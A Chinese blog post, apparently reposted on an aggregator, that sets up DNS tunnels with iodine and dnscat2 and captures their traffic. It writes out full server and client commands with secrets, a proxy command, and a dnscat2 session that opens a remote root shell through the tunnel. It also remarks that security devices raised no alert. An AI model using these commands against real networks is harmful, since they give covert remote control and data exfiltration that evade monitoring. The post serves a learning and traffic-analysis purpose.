DNS隧道流量分析

这篇具有很好参考价值的文章主要介绍了DNS隧道流量分析。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

1.域名准备

选择哪家的云都没问题,国内云需要实名,不建议使用,这里我选择的TX云,因为之前注册过了,自己拿来做个流量分析不成问题

域名添加解析记录

需要准备自己的vps作为DNS隧道的服务端,且需要添加ns记录

2.iodined搭建

关闭53端口关闭开机自启

systemctl stop systemd-resolved
systemctl disable systemd-resolved

之后53端口已关闭

启动服务端

iodined -f -c -P 1qaz@WSX 192.168.100.1 ns.xxx.xyz -DD

参数说明

-f:在前台运行
-c:禁止检查所有传入请求的客户端IP地址。
-P:客户端和服务端之间用于验证身份的密码。
-D:指定调试级别,-DD指第二级。“D”的数量随级别增加。

客户端

iodine -f -P 1qaz@WSX ns.aligoogle.xyz -M 200

客户端连接正常,且服务端显示客户端连接成功

【----帮助网安学习,以下所有学习资料免费领!加vx:yj009991,备注 “博客园” 获取!】

 ① 网安学习成长路径思维导图
 ② 60+网安经典常用工具包
 ③ 100+SRC漏洞分析报告
 ④ 150+网安攻防实战技术电子书
 ⑤ 最权威CISSP 认证考试指南+题库
 ⑥ 超1800页CTF实战技巧手册
 ⑦ 最新网安大厂面试题合集(含答案)
 ⑧ APP客户端安全检测指南(安卓+IOS)

查看客户端网卡,因为配置的时候一直不太稳定,所以这里服务端分配的虚拟网卡我更换为了192.168.121.1

测试隧道是否通信

延时比较高,也不稳定。

通过隧道连接目标主机

ssh -p 2222 root@192.168.121.2

这里我换ssh的端口了

但是发现安全设备在连接高危端口的时候无告警

3.流量分析

抓取dns0网卡的流量

tcpdump -i dns0 port 53 -w file.pcap

参数-i 指定网卡, port 指定端口,DNS使用53端口,-w 写入文件。

查看日志发现所有的流量都是DNS日志,但是目的都为自己的VPS

其实能够根据流量特征识别工具类型。

4.试错

本来我是想使用穿透工具通过隧道穿透的,这里使用nps做隧道走socks,想走虚拟网卡需要修改nps配置文件

./npc -server=192.168.120.1:63323 -vkey=n4jg3lrvg19qlqth -type=tcp

查看nps上线后,需要做端口转发,不做端口转发无法直接使用虚拟地址的隧道,这里其实没有这么走的意义

但是这里发现行不通,参考了一些文章,发现某位师傅写的有点儿问题,这里大可不必,没有所谓的套层+转口转发,单一走隧道都不稳定以及卡的要死,怎么玩儿套娃。

5. dnscat2搭建

安装准备

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
curl -sSL https://get.rvm.io | bash
source /etc/profile.d/rvm.sh
rvm install 2.6.0
source /etc/profile.d/rvm.sh
rvm use 2.6.0
gem install bundler
bundle install
ruby ./dnscat2.rb

需要注意这里开放vps的53的udp端口

firewall-cmd --zone=public --add-port=53/udp --permanent
firewall-cmd --reload

国内服务器TX云的话需要更换源,下载文件需要kexue上网,境内下载tools找不到服务

客户端

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/client/
make
​
./dnscat --dns server=IP,port=53 --secret=f361f307f523b07352d0bab1b765a888    //直连模式
./dnscat --dns server=ling.domain --secret=1qaz2wsx             //中继模式
直连模式

Server:

Client:

中继模式
ruby ./dnscat2.rb ns.domain -e open -c 1qaz2wsx --no-cache

客户端

./dnscat --dns domain=ling.domain --secret=1qaz2wsx   
./dnscat --dns server=www.domain --secret=1qaz2wsx   

服务端命令

sessions 列出所有session
session -i 2 进入session 2
shell:创建交互式shell
suspend:返回上一层
exit:退出
clear(清屏)
delay(修改远程会话超时时间)
exec(执行远程机上的程序)
shell(得到一个反弹shell,此处必须在1::command(kali)中使用)
download/upload(两端之间上传下载文件)
listen <本地端口> <控制端IP/127.0.0.1>:<端口>(端口转发,此处)(此处必须在1::command(kali)中使用)
dnscat2> session -i 1
New window created: 1
history_size (session) => 1000
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a command session!
​
That means you can enter a dnscat2 command such as
'ping'! For a full list of clients, try 'help'.
​
command (ubuntu) 1> whoami
Error: Unknown command: whoami
command (ubuntu) 1> shell
Sent request to execute a shell
command (ubuntu) 1> New window created: 2
Shell session created!
whoami
Error: Unknown command: whoami
command (ubuntu) 1> session -i 2
New window created: 2
history_size (session) => 1000
Session 2 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a console session!
​
That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don't
see a prompt, try typing 'pwd' or something!
​
To go back, type ctrl-z.
​
sh (ubuntu) 2> whoami
sh (ubuntu) 2> root
 tcpdump -i dns0 port 53 -w file.pcap

流量包内的数据内容

请求包和回包区别不大,在返回包多了域名的信息的TXT记录加密传输信息,可以看到DNS的查询请求的域名信息前的一串数据,里面就是加密过后的交互数据。

6 其它工具

跟工具关系不大,隧道的话DNS只要ip和域名没标签,其实走的都是udp的协议,所以在安全设备上都是流量数据,其类似的工具有dns2tcp等,但是总体来讲该隧道比较慢不稳定,比较慢且传输不支持大流量传输。

更多网安技能的在线实操练习,请点击这里>>

 文章来源地址https://www.toymoban.com/news/detail-467204.html

到了这里,关于DNS隧道流量分析的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 什么是 DNS 隧道以及如何检测和防止攻击

    什么是 DNS 隧道? DNS 隧道是一种DNS 攻击技术,涉及在 DNS 查询和响应中对其他协议或程序的信息进行编码。DNS 隧道通常具有可以锁定目标 DNS 服务器的数据有效负载,允许攻击者管理应用程序和远程服务器。  DNS 隧道往往依赖于受感染系统的外部网络连接 - DNS 隧道需要一种

    2024年02月09日
    浏览(35)
  • 内网隧道—HTTP\DNS\ICMP

           本文仅限于安全研究和学习,用户承担因使用此工具而导致的所有法律和相关责任! 作者不承担任何法律和相关责任! Neo-reGeorg 是一个旨在积极重构 reGeorg 的项目,目的是: 提高可用性,避免特征检测 提高 tunnel 连接安全性 提高传输内容保密性 应对更多的网络环

    2024年02月13日
    浏览(37)
  • 安全防御------SSL VPN篇_防范 ssl 隧道内部的攻击流量

    目录 一、SSL工作过程 1.SSL握手协议的第一阶段 2.SSL握手协议的第二阶段 3.SSL握手协议的第三阶段​编辑 4.SSL握手协议的第四阶段​编辑 二、SSL预主密钥有什么作用? 三、SSL VPN主要用于那些场景? 四、SSL VPN的实现方式有哪些? 1.虚拟网关 2.WEB代理 3.文件共享 4.端口转发 5.网

    2024年01月25日
    浏览(50)
  • 域名劫持、域名欺骗、域名污染是什么意思?DNS是啥?

    一、DNS 是啥? DNS 是洋文“Domain Name System”的缩写,直译过来就是“域名系统”。 二、DNS 有啥用? 咱们每天打交道的这个互联网,其底层的基石是“IP”。IP 是“Internet Protocol”的缩写,中文就“互联网协议”(光看名字就知道这玩意儿很重要)。咱们日常用的那些互联网软

    2024年02月08日
    浏览(54)
  • 网络安全内网渗透之DNS隧道实验--dnscat2直连模式

    目录 一、DNS隧道攻击原理 二、DNS隧道工具 (一)安装dnscat2服务端 (二)启动服务器端 (三)在目标机器上安装客户端 (四)反弹shell         在进行DNS查询时,如果查询的域名不在DNS服务器本机的缓存中,就会访问互联网进行查询,然后返回结果。入股哦在互联网上

    2024年02月06日
    浏览(51)
  • DNS域名解析过程详解

    目录 一、DNS系统 二、域名 三、域名服务器 根域名服务器 顶级域名服务器 授权域名服务器 本地域名服务器 四、域名解析过程  递归查询 递归查询与迭代查询结合 主机向本地域名服务器的查询是递归查询 本地域名服务器向根域名服务器的查询是迭代查询 一次完整的DNS域名

    2024年02月10日
    浏览(42)
  • DNS域名查询过程

    目录 DNS(Domain Names System) 域名转IP IP转域名  域名 域名查询流程 浏览器DNS缓存 操作系统缓存 本地host文件 完整流程 递归查询 迭代查询 域名系统,将域名和 IP 地址进行转换的服务器。 域名转IP 在命令行中通过 nslookup + 域名可以查看域名解析到ip 也可以在Chrome浏览器中 c

    2024年02月03日
    浏览(46)
  • DNS(域名解析服务)

    安装DNS服务; IspSrv作为DNS的的根域 创建test1.com - test100.com,并在所有正向区域中创建一条A记录,解析到本机地址。 所有无法解析的域名均解析为本机地址 步骤一 - 添加chinaskills.global正向区域和反向区域 前提条件:安装DNS服务 有时候会添加不成功,报区域名错误,退出去重

    2024年01月23日
    浏览(37)
  • Linux域名解析(DNS)

    域名系统(英文:Domain Name System,缩写:DNS),使用应用层协议,是互联网的一项服务。 它作为将域名和IP地址相互映射的一个分布式数据库,能够使人更方便地访问互联网。 每一台 DNS 服务器都只负责管理一个有限范围(一个或几个域)内的主机域 名和 IP 地址的对应关系

    2024年02月09日
    浏览(63)
  • 域名解析协议-DNS

    DNS(Domain Name System)是互联网上非常重要的一项服务,我们每天上网都要依靠大量的DNS服务。在Internet上,用户更容易记住的是域名,但是网络中的计算机的互相访问是通过 IP 地址实现的。DNS 最常用的功能是给用户提供域名解析服务,将用户的域名解析成网络上能够访问的

    2024年02月12日
    浏览(48)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包